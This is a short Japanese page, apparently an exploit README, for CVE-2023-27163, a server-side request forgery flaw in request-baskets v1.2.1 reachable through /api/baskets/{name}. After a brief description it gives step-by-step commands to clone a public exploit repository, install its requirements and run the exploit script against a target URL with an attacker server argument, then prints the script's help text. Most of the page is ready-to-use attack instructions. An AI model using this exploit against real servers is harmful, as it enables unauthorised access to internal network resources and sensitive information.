
CVE-2023-27163 Request-Baskets v1.2.1 - サーバーサイドリクエストフォージェリ (SSRF)
Request-Baskets v1.2.1 - サーバーサイドリクエストフォージェリ (SSRF)
request-baskets v1.2.1 以前には、コンポーネント /api/baskets/{name} を介したサーバーサイドリクエストフォージェリ (SSRF) が存在することが判明しました。この脆弱性により、攻撃者は細工されたAPIリクエストを介してネットワークリソースや機密情報にアクセスできるようになります。
git clone https://github.com/0xFTW/CVE-2023-27163
cd CVE-2023-27163
pip3 install -r requirements.txt
python3 CVE-2023-27163.py url attack_server
Request Baskets スクリプトのエクスプロイト
位置引数:
url サーバーのメインパス (/) (例: http://127.0.0.1:5000/)
attack_server ATTACK_SERVER
オプション:
-h, --help このヘルプメッセージを表示して終了